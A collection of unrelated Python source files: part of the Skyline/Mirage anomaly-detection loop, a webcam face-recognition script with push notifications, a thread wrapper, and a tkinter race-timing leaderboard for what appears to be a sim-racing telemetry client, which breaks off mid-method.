timeseries_dir = base_name.replace('.', '/')
training_dir = '%s/%s/%s' % (
settings.IONOSPHERE_DATA_FOLDER, str(int(metric[2])),
str(timeseries_dir))
anomaly_data = '%s/%s.json' % (training_dir, base_name)
check_full_duration = (int(alert[3]) * 60 * 60)
# TODO:
# Due to how the matrixprofile identifies
# discords, if a metric triggers as
# anomalous with 3sigma it must be checked
# for at x window periods thereafter as
# matrixprofile may only identify a discord
# later when the time series changes again.
for app in SNAB_CHECKS:
if app == skyline_app and check_full_duration:
for snab_context in SNAB_CHECKS[app]:
if snab_context == 'testing':
for algorithm in SNAB_CHECKS[app][snab_context]:
try:
alert_slack_channel = SNAB_CHECKS[app][snab_context][algorithm]['alert_slack_channel']
except:
alert_slack_channel = None
try:
algorithm_source = SNAB_CHECKS[app][snab_context][algorithm]['algorithm_source']
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to verify algorithm_source for %s for the %s context' % (
algorithm, snab_context))
break
if not os.path.isfile(algorithm_source):
logger.error('error :: algorithm_source file %s does not exist for %s for the %s context' % (
algorithm_source, algorithm, snab_context))
break
try:
algorithm_parameters = SNAB_CHECKS[app][snab_context][algorithm]['algorithm_parameters']
except:
algorithm_parameters = {}
try:
max_execution_time = SNAB_CHECKS[app][snab_context][algorithm]['max_execution_time']
except:
max_execution_time = 1.0
try:
algo_debug_logging = SNAB_CHECKS[app][snab_context][algorithm]['debug_logging']
except:
algo_debug_logging = False
try:
for namespace in SNAB_CHECKS[app][snab_context][algorithm]['namespaces']:
if namespace in base_name:
snab_check_details = {
'metric': base_name,
'timestamp': int(metric[2]),
'original_anomaly_timestamp': int(metric[2]),
'value': metric[0],
'full_duration': check_full_duration,
'anomaly_data': anomaly_data,
'source': 'mirage',
'added_at': added_to_snab_at,
'original_added_at': added_to_snab_at,
'context': snab_context,
'algorithm': algorithm,
'algorithm_source': algorithm_source,
'algorithm_parameters': algorithm_parameters,
'max_execution_time': max_execution_time,
'debug_logging': algo_debug_logging,
'alert_slack_channel': alert_slack_channel,
'processed': None,
'analysed': None,
'anomalous': None,
'anomalyScore': None,
'snab_only': False,
}
add_snab_check = True
if base_name in snab_checks_sent:
add_snab_check = False
break
if add_snab_check:
self.redis_conn.sadd('snab.work', str(snab_check_details))
logger.info('added snab check for %s with algorithm %s for alerter %s' % (
base_name, algorithm, str(alert[1])))
snab_checks_sent.append(base_name)
break
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check and add check_details to snab.work Redis set if required')
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp, waterfall_panorama_data]
redis_set = 'mirage.waterfall_alerts.sent_to_ionosphere'
# @added 20200905 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp, waterfall_panorama_data]
redis_set = 'mirage.waterfall_alerts.sent_to_ionosphere'
literal_waterfall_alerts = []
try:
literal_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_set))
except:
literal_waterfall_alerts = []
waterfall_alerts = []
for literal_waterfall_alert in literal_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
waterfall_alerts.append(waterfall_alert)
for waterfall_alert in waterfall_alerts:
if waterfall_alert[0] == metric:
if int(waterfall_alert[1]) == metric_timestamp:
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed waterfall alert item from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove waterfall alert item for %s at %s from Redis set %s' % (
base_name, str(metric_timestamp), redis_set))
# TODO - Add anomaly to Panorama when a waterfall alert triggers
else:
logger.info('alert Redis key %s exists not alerting for %s' % (str(cache_key), metric[1]))
except Exception as e:
logger.error('error :: could not query Redis for cache_key - %s' % e)
# @added 20200916 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
snab_only_checks = []
if SNAB_ENABLED:
try:
literal_mirage_snab_only_checks = list(self.redis_conn_decoded.smembers(mirage_snab_only_checks_redis_set))
for snab_only_check_string in literal_mirage_snab_only_checks:
snab_only_check = literal_eval(snab_only_check_string)
snab_only_checks.append(snab_only_check)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine list from mirage.not_anomalous_metrics Redis set')
snab_only_checks = []
if not snab_only_checks:
logger.info('there are no snab_only_checks')
if snab_only_checks:
snab_only_checks_sent = []
for alert in all_alerts:
for snab_check in snab_only_checks:
try:
metric = snab_check['metric']
anomaly_data = snab_check['anomaly_data']
anomaly_timestamp = snab_check['timestamp']
original_anomaly_timestamp = snab_check['original_anomaly_timestamp']
value = snab_check['value']
original_added_at = snab_check['original_added_at']
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to details from snab_only_checks snab_check dict - %s' % str(snab_check))
try:
pattern_match, metric_matched_by = matched_or_regexed_in_list(skyline_app, metric, [alert[0]])
if LOCAL_DEBUG and pattern_match:
logger.debug('debug :: %s matched alert - %s' % (base_name, alert[0]))
try:
del metric_matched_by
except:
pass
except:
pattern_match = False
if pattern_match:
check_full_duration = (int(alert[3]) * 60 * 60)
for app in SNAB_CHECKS:
if app == skyline_app and check_full_duration:
for snab_context in SNAB_CHECKS[app]:
if snab_context == 'testing':
for algorithm in SNAB_CHECKS[app][snab_context]:
try:
alert_slack_channel = SNAB_CHECKS[app][snab_context][algorithm]['alert_slack_channel']
except:
alert_slack_channel = None
try:
algorithm_source = SNAB_CHECKS[app][snab_context][algorithm]['algorithm_source']
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to verify algorithm_source for %s for the %s context' % (
algorithm, snab_context))
break
if not os.path.isfile(algorithm_source):
logger.error('error :: algorithm_source file %s does not exist for %s for the %s context' % (
algorithm_source, algorithm, snab_context))
break
try:
algorithm_parameters = SNAB_CHECKS[app][snab_context][algorithm]['algorithm_parameters']
except:
algorithm_parameters = {}
try:
max_execution_time = SNAB_CHECKS[app][snab_context][algorithm]['max_execution_time']
except:
max_execution_time = 1.0
try:
algo_debug_logging = SNAB_CHECKS[app][snab_context][algorithm]['debug_logging']
except:
algo_debug_logging = False
try:
for namespace in SNAB_CHECKS[app][snab_context][algorithm]['namespaces']:
if namespace in metric:
snab_check_details = {
'metric': metric,
'timestamp': int(anomaly_timestamp),
'original_anomaly_timestamp': int(original_anomaly_timestamp),
'value': value,
'full_duration': check_full_duration,
'anomaly_data': anomaly_data,
'source': 'mirage',
'added_at': added_to_snab_at,
'original_added_at': original_added_at,
'context': snab_context,
'algorithm': algorithm,
'algorithm_source': algorithm_source,
'algorithm_parameters': algorithm_parameters,
'max_execution_time': max_execution_time,
'debug_logging': algo_debug_logging,
'alert_slack_channel': alert_slack_channel,
'processed': None,
'analysed': None,
'anomalous': None,
'anomalyScore': None,
'snab_only': True,
}
add_snab_check = True
if metric in snab_only_checks_sent:
add_snab_check = False
break
if add_snab_check:
self.redis_conn.sadd('snab.work', str(snab_check_details))
logger.info('added snab_only check for %s with algorithm %s for alerter %s' % (
metric, algorithm, str(alert[1])))
snab_only_checks_sent.append(metric)
break
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to check and add check_details to snab.work Redis set if required')
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
mirage_not_anomalous_metrics = []
try:
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# literal_mirage_not_anomalous_metrics = list(self.redis_conn.smembers('mirage.not_anomalous_metrics'))
literal_mirage_not_anomalous_metrics = list(self.redis_conn_decoded.smembers('mirage.not_anomalous_metrics'))
for metric_list_string in literal_mirage_not_anomalous_metrics:
metric = literal_eval(metric_list_string)
mirage_not_anomalous_metrics.append(metric)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine list from mirage.not_anomalous_metrics Redis set')
mirage_not_anomalous_metrics = []
if settings.NEGATE_ANALYZER_ALERTS:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if len(self.anomalous_metrics) == 0:
if len(mirage_anomalous_metrics) == 0:
# @modified 20200610 - Feature #3560: External alert config
# for negate_alert in settings.ALERTS:
for negate_alert in all_alerts:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# for not_anomalous_metric in self.not_anomalous_metrics:
for not_anomalous_metric in mirage_not_anomalous_metrics:
NEGATE_ALERT_MATCH_PATTERN = negate_alert[0]
NOT_ANOMALOUS_METRIC_PATTERN = not_anomalous_metric[1]
alert_match_pattern = re.compile(NEGATE_ALERT_MATCH_PATTERN)
negate_pattern_match = alert_match_pattern.match(NOT_ANOMALOUS_METRIC_PATTERN)
if negate_pattern_match:
try:
logger.info('negate alert sent: For %s' % (not_anomalous_metric[1]))
trigger_negater(negate_alert, not_anomalous_metric, second_order_resolution_seconds, metric_value)
except Exception as e:
logger.error('error :: could not send alert: %s' % e)
# Log progress
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if len(self.anomalous_metrics) > 0:
if len(mirage_anomalous_metrics) > 0:
logger.info('seconds since last anomaly :: %.2f' % (time() - now))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# logger.info('total anomalies :: %d' % len(self.anomalous_metrics))
logger.info('total anomalies :: %d' % len(mirage_anomalous_metrics))
logger.info('exception stats :: %s' % str(exceptions))
logger.info('anomaly breakdown :: %s' % str(anomaly_breakdown))
# Log to Graphite
if process_metric_check_files:
run_time = time() - run_timestamp
logger.info('seconds to run :: %.2f' % run_time)
graphite_run_time = '%.2f' % run_time
send_metric_name = skyline_app_graphite_namespace + '.run_time'
send_graphite_metric(skyline_app, send_metric_name, graphite_run_time)
# @added 20200805 - Task #3662: Change mirage.last_check keys to timestamp value
# Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Add the mirage metric and its EXPIRATION_TIME to
# the mirage.metrics_expiration_times so that Mirage
# can determine the metric EXPIRATION_TIME without
# having to create and iterate the all_alerts
# object in the Mirage analysis phase so that the
# reported anomaly timestamp can be used to determine
# whether the EXPIRATION_TIME should be applied to a
# batch metric in the alerting and Ionosphere contexts
# @modified 20201107 - Feature #3830: metrics_manager
# Use metrics_manager data, now managed there
# mirage_metrics_expiration_times = []
# try:
# mirage_metrics_expiration_times = list(self.redis_conn_decoded.smembers('mirage.metrics_expiration_times'))
# if LOCAL_DEBUG:
# logger.info('debug :: fetched the mirage.metrics_expiration_times Redis set')
# except:
# logger.info('failed to fetch the mirage.metrics_expiration_times Redis set')
# mirage_metrics_expiration_times = []
# try:
# mirage_unique_metrics = list(self.redis_conn_decoded.smembers('mirage.unique_metrics'))
# mirage_unique_metrics_count = len(mirage_unique_metrics)
# logger.info('mirage.unique_metrics Redis set count - %s' % str(mirage_unique_metrics_count))
# if LOCAL_DEBUG:
# logger.info('debug :: fetched the mirage.unique_metrics Redis set')
# logger.info('debug :: %s' % str(mirage_unique_metrics))
# except:
# logger.info('failed to fetch the mirage.unique_metrics Redis set')
# mirage_unique_metrics == []
# for metric in mirage_unique_metrics:
# if metric.startswith(settings.FULL_NAMESPACE):
# base_name = metric.replace(settings.FULL_NAMESPACE, '', 1)
# else:
# base_name = metric
# mirage_alert_expiration_data = [base_name, int(alert[2])]
# if str(mirage_alert_expiration_data) not in mirage_metrics_expiration_times:
# try:
# self.redis_conn.sadd('mirage.metrics_expiration_times', str(mirage_alert_expiration_data))
# if LOCAL_DEBUG:
# logger.info('debug :: added %s to mirage.metrics_expiration_times' % str(mirage_alert_expiration_data))
# except:
# if LOCAL_DEBUG:
# logger.error('error :: failed to add %s to mirage.metrics_expiration_times set' % str(mirage_alert_expiration_data))
# Reset counters
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
# self.anomalous_metrics[:] = []
# self.not_anomalous_metrics[:] = []
# Reset metric_variables
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
# self.metric_variables[:] = []
# self.sent_to_crucible[:] = []
# self.sent_to_panorama[:] = []
# self.sent_to_ionosphere[:] = []
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
delete_redis_sets = [
'mirage.anomalous_metrics',
'mirage.not_anomalous_metrics',
'mirage.metric_variables',
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# Handle once per minute
# 'mirage.sent_to_crucible',
# 'mirage.sent_to_panorama',
# 'mirage.sent_to_ionosphere',
]
for i_redis_set in delete_redis_sets:
redis_set_to_delete = i_redis_set
try:
self.redis_conn.delete(redis_set_to_delete)
logger.info('deleted Redis set - %s' % redis_set_to_delete)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete Redis set - %s' % redis_set_to_delete)
"""
DEVELOPMENT ONLY
# @added 20160806 - Bug #1558: Memory leak in Analyzer
# Debug with garbage collection - http://code.activestate.com/recipes/65333/
"""
if ENABLE_MEMORY_PROFILING and garbage_collection_enabled:
if settings.ENABLE_DEBUG or LOCAL_DEBUG:
for i in get_objects():
after[type(i)] += 1
gc_results = [(k, after[k] - before[k]) for k in after if after[k] - before[k]]
for gc_result in gc_results:
logger.info('debug :: %s' % str(gc_result))
# @added 20160806 - Bug #1558: Memory leak in Analyzer
# Debug with garbage collection - http://code.activestate.com/recipes/65333/
# show the dirt ;-)
try:
logger.info('garbage collecting')
all_the_garbage = self.dump_garbage()
except:
logger.error('error :: during garbage collecting')
logger.error(traceback.format_exc())
all_the_garbage = 'gc errored'
if settings.ENABLE_DEBUG or LOCAL_DEBUG:
logger.info(all_the_garbage)
logger.info('garbage collected')
if LOCAL_DEBUG:
logger.info('debug :: Memory usage end of run: %s (kb)' % resource.getrusage(resource.RUSAGE_SELF).ru_maxrss)
# @added 20200903 - Task #3730: Validate Mirage running multiple processes
# Send checks.stale_discarded and checks.pending metrics
if int(time()) >= (last_sent_to_graphite + 60):
stale_check_discarded = []
try:
stale_check_discarded = list(self.redis_conn_decoded.smembers('mirage.stale_check_discarded'))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get mirage.stale_check_discarded set from Redis')
stale_check_discarded = []
stale_check_discarded_count = len(stale_check_discarded)
logger.info('checks.stale_discarded :: %s' % str(stale_check_discarded_count))
send_metric_name = '%s.checks.stale_discarded' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, str(stale_check_discarded_count))
checks_pending = [f_pending for f_pending in listdir(settings.MIRAGE_CHECK_PATH) if isfile(join(settings.MIRAGE_CHECK_PATH, f_pending))]
checks_pending_count = len(checks_pending)
logger.info('checks.pending :: %s' % str(checks_pending_count))
send_metric_name = '%s.checks.pending' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, str(checks_pending_count))
checks_done = []
try:
checks_done = list(self.redis_conn_decoded.smembers('mirage.checks.done'))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get mirage.checks.done set from Redis')
checks_done = []
checks_done_count = len(checks_done)
logger.info('checks.done :: %s' % str(checks_done_count))
send_metric_name = '%s.checks.done' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, str(checks_done_count))
# @modified 20200903 - Task #3730: Validate Mirage running multiple processes
# Only send panorama, ionosphere and crucible metrics once a minute
if settings.ENABLE_CRUCIBLE and settings.MIRAGE_CRUCIBLE_ENABLED:
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# sent_to_crucible = str(len(self.sent_to_crucible))#
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# sent_to_crucible = str(len(list(self.redis_conn.smembers('mirage.sent_to_crucible'))))
sent_to_crucible = str(len(list(self.redis_conn_decoded.smembers('mirage.sent_to_crucible'))))
except:
sent_to_crucible = '0'
logger.info('sent_to_crucible :: %s' % sent_to_crucible)
send_metric_name = '%s.sent_to_crucible' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, sent_to_crucible)
if settings.PANORAMA_ENABLED:
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# sent_to_panorama = str(len(self.sent_to_panorama))
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# sent_to_panorama = str(len(list(self.redis_conn.smembers('mirage.sent_to_panorama'))))
sent_to_panorama = str(len(list(self.redis_conn_decoded.smembers('mirage.sent_to_panorama'))))
except:
sent_to_panorama = '0'
logger.info('sent_to_panorama :: %s' % sent_to_panorama)
send_metric_name = '%s.sent_to_panorama' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, sent_to_panorama)
if settings.IONOSPHERE_ENABLED:
try:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# sent_to_ionosphere = str(len(self.sent_to_ionosphere))
# @modified 20191022 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# sent_to_ionosphere = str(len(list(self.redis_conn.smembers('mirage.sent_to_ionosphere'))))
sent_to_ionosphere = str(len(list(self.redis_conn_decoded.smembers('mirage.sent_to_ionosphere'))))
except Exception as e:
logger.error('error :: could not determine sent_to_ionosphere: %s' % e)
sent_to_ionosphere = '0'
logger.info('sent_to_ionosphere :: %s' % sent_to_ionosphere)
send_metric_name = '%s.sent_to_ionosphere' % skyline_app_graphite_namespace
send_graphite_metric(skyline_app, send_metric_name, sent_to_ionosphere)
last_sent_to_graphite = int(time())
delete_redis_sets = [
'mirage.sent_to_crucible',
'mirage.sent_to_panorama',
'mirage.sent_to_ionosphere',
'mirage.stale_check_discarded',
'mirage.checks.done',
# @added 20200916 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
mirage_snab_only_checks_redis_set,
]
for i_redis_set in delete_redis_sets:
redis_set_to_delete = i_redis_set
try:
self.redis_conn.delete(redis_set_to_delete)
logger.info('deleted Redis set - %s' % redis_set_to_delete)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete Redis set - %s' % redis_set_to_delete)
# Sleep if it went too fast
if time() - now < 1:
logger.info('sleeping due to low run time...')
# sleep(10)
sleep(1)
|
test.py
|
from threading import Thread, Lock
import time, os, sys, shutil
import imutils
import cv2
import numpy as np
sys.path.append('.')
import tensorflow as tf
import detect_face_detection
import urllib.request
import zerorpc
import send_notifications
import image_upload
url='http://172.25.97.64:8080/shot.jpg'
dir_path = os.path.dirname(os.path.realpath(__file__))
UPLOAD_FOLDER = dir_path + "\\images"
arr = list()
print("Loading Module")
class WebcamVideoStream :
def __init__(self, src = 0, width = 1920, height = 1080) :
self.stream = cv2.VideoCapture(src)
self.stream.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.stream.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
(self.grabbed, self.frame) = self.stream.read()
self.started = False
self.read_lock = Lock()
def start(self) :
if self.started :
print ("already started!!")
return None
self.started = True
self.thread = Thread(target=self.update, args=())
self.thread.start()
return self
def update(self) :
while self.started :
(grabbed, frame) = self.stream.read()
self.read_lock.acquire()
self.grabbed, self.frame = grabbed, frame
self.read_lock.release()
def read(self) :
self.read_lock.acquire()
frame = self.frame.copy()
self.read_lock.release()
return frame
def stop(self) :
self.started = False
self.thread.join()
def __exit__(self, exc_type, exc_value, traceback) :
self.stream.release()
# def process(self):
# self.thread.start()
# return self
if __name__ == "__main__" :
vs = WebcamVideoStream().start()
c = zerorpc.Client()
c.connect("tcp://127.0.0.1:4242")
if os.path.exists("images"):
shutil.rmtree("images")
os.mkdir('images')
minsize = 25 # minimum size of face
threshold = [ 0.6, 0.7, 0.7 ] # three steps's threshold
factor = 0.709 # scale factor
fps = 0
frame_num = 60
gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.30)
sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options, log_device_placement=False))
with sess.as_default():
pnet, rnet, onet = detect_face_detection.create_mtcnn(sess, None)
while True :
imgResponse = urllib.request.urlopen(url)
imgNp = np.array(bytearray(imgResponse.read()),dtype=np.uint8)
imgs = cv2.imdecode(imgNp,-1)
# fps = FPS().start()
start_time = time.time()
frame = vs.read()
img = frame[:,:,0:3]
boxes, _ = detect_face_detection.detect_face(imgs, minsize, pnet, rnet, onet, threshold, factor)
for i in range(boxes.shape[0]):
pt1 = (int(boxes[i][0]), int(boxes[i][1]))
pt2 = (int(boxes[i][2]), int(boxes[i][3]))
x = int(boxes[i][0]) - 150
y = int(boxes[i][1]) - 150
w = int(boxes[i][2]) + 190
h = int(boxes[i][3]) + 150
frame = cv2.rectangle(imgs, (x,y), (w, h), color=(0, 255, 0))
frame_info = 'Frame: {0}, FPS: {1:.2f}'.format(frame_num, fps)
# if(float(boxes[i][4]) >= 0.90):
sub_faces = frame[y:h, x:w]
# sub_faces = frame[p1, p2]
stamp = str(time.time())
filename = "face_" + stamp + ".jpg"
path = UPLOAD_FOLDER + "\\" + filename
cv2.imwrite(path, sub_faces)
result = c.classifyFile(path)
# print(type(result[0]) == dict)
if (len(result) != 0):
if (type(result[0]) == dict and len(result[0]['candidates']) != 0):
# result[0]['candidates']['name']
if(result[0]['candidates']['name'] != 'Not Recognized'):
print(result[0])
recognized_faces = result[0]
cv2.putText(imgs, recognized_faces['candidates']['name'], (x,y),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 1)
if not recognized_faces['candidates']['name'] in arr:
upload_response = image_upload.upload(filename)
response = send_notifications.send_push_notification(upload_response['url'], recognized_faces['candidates']['name'])
# if (response.status_code == 200):
# print(response)
arr.append(recognized_faces['candidates']['name'])
# os.remove(path)
else:
cv2.putText(imgs, "Not Recognized", (x,y),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 1)
if os.path.exists(path):
os.remove(path)
end_time = time.time()
fps = fps * 0.9 + 1/(end_time - start_time) * 60
# fps = (end_time - start_time) / frame_num
frame_info = 'Frame: {0}, FPS: {1:.2f}'.format(frame_num, fps)
cv2.putText(imgs, frame_info, (10, frame.shape[0]-10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 1)
cv2.imshow('webcam', imgs)
# cv2.putText(img, frame_info, (10, frame.shape[0]-10), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 1)
# cv2.imshow('video', imgs)
if cv2.waitKey(1) & 0xFF == ord('q') :
break
# fps.update()
# fps.stop()
vs.stop()
cv2.destroyAllWindows()
|
background_thread.py
|
from typing import Callable
from threading import Thread
class BackgroundThread(object):
_thread = None
def __init__(self, target):
# type: (Callable) -> None
self._thread = Thread(target=target)
self._thread.daemon = True
def is_alive(self):
# type: () -> bool
return self._thread.is_alive()
def start(self):
# type: () -> None
self._thread.start()
def join(self):
# type: () -> None
self._thread.join()
|
main.py
|
import copy
import datetime
import json
from PIL import Image, ImageTk
import queue
import logging
import socket
import sys
import time
import threading
import tkinter as tk
from tkinter.font import Font
import accProtocol
def load_images() -> dict:
with open("./cars.json", "r") as fp:
car_data = json.load(fp)
image_cache = {}
for car_model in car_data.keys():
name = car_data[car_model]["Brand"]
if name not in image_cache:
file = Image.open(f"images/logos/{name}.png")
image = ImageTk.PhotoImage(file)
image_cache[name] = image
file.close()
car_data[car_model]["Logo"] = image_cache[name]
return car_data
def from_ms(time: int) -> str:
"""
Convert millisconds into a string in format mm:ss.ms
"""
minute = time // 60_000
second = time // 1000 - minute * 60
millisecond = time - minute * 60_000 - second * 1000
if second < 10:
second = "0" + str(second)
else:
second = str(second)
if millisecond < 10:
millisecond = f"00{millisecond}"
elif millisecond < 100:
millisecond = f"0{millisecond}"
else:
millisecond = str(millisecond)
return f"{minute}:{second}.{millisecond}"
def from_date_time(time: datetime.datetime) -> str:
"""
Return a string in format hh:mm:ss
"""
days = time.day - 1
hours = time.hour
minutes = time.minute
seconds = time.second
hours = days * 24 + hours - 1
if hours < 10:
hours = f"0{hours}"
if minutes < 10:
minutes = f"0{minutes}"
if seconds < 10:
seconds = f"0{seconds}"
return f"{hours}:{minutes}:{seconds}"
def create_cell(parent, text, bg="white", font=None, max_width=0,
height=1, anchor=tk.CENTER, relief=tk.FLAT):
width = len(text)
if max_width > 0:
width = max_width
if font:
cell = tk.Label(
parent, text=text, bg=bg, width=width, height=height,
justify=tk.LEFT, anchor=anchor, font=font, relief=relief)
else:
cell = tk.Label(
parent, text=text, bg=bg, width=width, height=height,
justify=tk.LEFT, anchor=anchor, relief=relief)
return cell
class Table(tk.Frame):
def __init__(self, parent, font, header, color_1, color_2, row=1) -> None:
tk.Frame.__init__(self, parent)
self.row = row
self.column = len(header)
self.labels = []
self.old_entries = []
self.color_1 = color_1
self.color_2 = color_2
self.car_data = load_images()
for i in range(self.row):
column_labels = []
for j in range(self.column):
width = header[j]["width"]
if i % 2 == 0:
background = self.color_1
else:
background = self.color_2
if j == 4:
label = create_cell(
parent, "", background, font, width, 2, tk.W)
else:
label = create_cell(parent, "", background, font, width, 2)
label.grid(row=i, column=j, padx=1, sticky=tk.NSEW)
column_labels.append(label)
self.labels.append(column_labels)
def order_entrie_by_position(self, data) -> list:
entries = []
position = 1
data_entries = data["entries"]
nb_entries = len(data_entries)
while position <= nb_entries:
for entry in data_entries.keys():
if (len(data_entries[entry]) > 0 and
position == data_entries[entry]["position"]):
entries.append(data_entries[entry])
position += 1
return entries
def update_position(self, x, y, entry, no_prev_entries):
# TODO clean this shit
try:
position = entry["position"]
if (no_prev_entries or
self.old_entries[y]["position"] != position):
string = position
self.labels[y][x].configure(text=string)
except IndexError:
print(position)
print(no_prev_entries)
print(y)
print(self.old_entries)
breakpoint
def update_car_number(self, x, y, entry, no_prev_entries):
car_number = entry["car_number"]
if (no_prev_entries or
self.old_entries[y]["car_number"] != car_number):
string = car_number
self.labels[y][x].configure(text=string)
def update_cup_category(self, x, y, entry, no_prev_entries):
cup_category = entry["cup_category"]
if (no_prev_entries or
self.old_entries[y]["cup_category"] != cup_category):
string = cup_category
self.labels[y][x].configure(text=string)
def update_car_logo(self, x, y, entry, no_prev_entries):
model_number = entry["manufacturer"]
if (no_prev_entries or
self.old_entries[y]["manufacturer"] != model_number):
logo = self.car_data[str(model_number)]["Logo"]
if y % 2 == 0:
color = self.color_1
else:
color = self.color_2
label = tk.Label(self.master, bg=color, image=logo)
label.image = logo
label.place(x=0, y=0)
label.grid(row=y, column=x, padx=1, sticky=tk.NSEW)
self.labels[y][x] = label
def update_driver(self, x, y, entry, no_prev_entries):
first_name = entry["driver"]['first_name']
last_name = entry["driver"]['last_name']
if (no_prev_entries or
(self.old_entries[y]["driver"]["first_name"] != first_name and
self.old_entries[y]["driver"]["last_name"] != last_name)):
team = entry["team"]
string = f"{team}\n{first_name} {last_name}"
self.labels[y][x].configure(text=string)
def update_lap_time(self, x, y, lap_type, lap, no_prev_entries):
if (no_prev_entries or
self.old_entries[y][lap_type] != lap):
string = from_ms(lap)
self.labels[y][x].configure(text=string)
def update_lap_counter(self, x, y, entry, no_prev_entries):
laps = entry["lap"]
if no_prev_entries or self.old_entries[y]["lap"] != laps:
string = laps
self.labels[y][x].configure(text=string)
def update_sector(self, x, y, sector, time, no_prev_entries):
if (no_prev_entries or
(len(self.old_entries[y]["sectors"]) == 0 or
self.old_entries[y]["sectors"][sector] != time)):
string = from_ms(time)
self.labels[y][x].configure(text=string)
def update_pit_counter(self, x, y, entry, local_data):
car_id = entry["car_id"]
pits = local_data[car_id]["pits"]
string = f"{pits}"
self.labels[y][x].configure(text=string)
def update_location(self, x, y, entry, no_prev_entries):
location = entry["car_location"]
if (no_prev_entries or
self.old_entries[y]["car_location"] != location):
if location == "Track":
string = ""
if y % 2 == 0:
color = self.color_1
else:
color = self.color_2
else:
# Gas station emoji
string = "\u26FD"
if location == "Pitlane":
color = "red"
elif location == "PitEntry":
color = "blue"
elif location == "PitExit":
color = "green"
else:
# edge case when location is none during a pit
# to track transition I guess
color = "purple"
self.labels[y][x].configure(text=string, bg=color)
def update_text(self, data, local_data):
entries = self.order_entrie_by_position(data)
nb_entries = len(data["entries"])
if nb_entries == 0 or len(entries) == 0:
return
for grid_y in range(nb_entries):
for grid_x in range(self.column):
no_prev_entries = len(self.old_entries) == 0 or grid_x not in self.old_entries
entry = entries[grid_y]
if grid_x == 0:
self.update_position(
grid_x, grid_y, entry, no_prev_entries)
elif grid_x == 1:
self.update_car_number(
grid_x, grid_y, entry, no_prev_entries)
elif grid_x == 2:
self.update_cup_category(
grid_x, grid_y, entry, no_prev_entries)
elif grid_x == 3:
self.update_car_logo(
grid_x, grid_y, entry, no_prev_entries)
elif grid_x == 4:
self.update_driver(
grid_x, grid_y, entry, no_prev_entries)
elif grid_x == 5:
self.update_lap_time(
grid_x, grid_y, "best_session_lap",
entry["best_session_lap"], no_prev_entries)
elif grid_x == 6:
self.update_lap_time(
grid_x, grid_y, "current_lap",
entry["current_lap"], no_prev_entries)
elif grid_x == 7:
self.update_lap_counter(
grid_x, grid_y, entry, no_prev_entries)
elif grid_x == 8:
self.update_lap_time(
grid_x, grid_y, "last_lap",
entry["last_lap"], no_prev_entries)
elif grid_x == 9 and len(entries[grid_y]["sectors"]) > 0:
self.update_sector(
grid_x, grid_y, 0,
entries[grid_y]["sectors"][0], no_prev_entries)
elif grid_x == 10 and len(entries[grid_y]["sectors"]) > 0:
self.update_sector(
grid_x, grid_y, 1,
entries[grid_y]["sectors"][1], no_prev_entries)
elif grid_x == 11 and len(entries[grid_y]["sectors"]) > 0:
self.update_sector(
grid_x, grid_y, 2,
entries[grid_y]["sectors"][2], no_prev_entries)
elif grid_x == 12:
self.update_pit_counter(grid_x, grid_y, entry, local_data)
elif grid_x == 13:
self.update_location(
grid_x, grid_y, entry, no_prev_entries)
else:
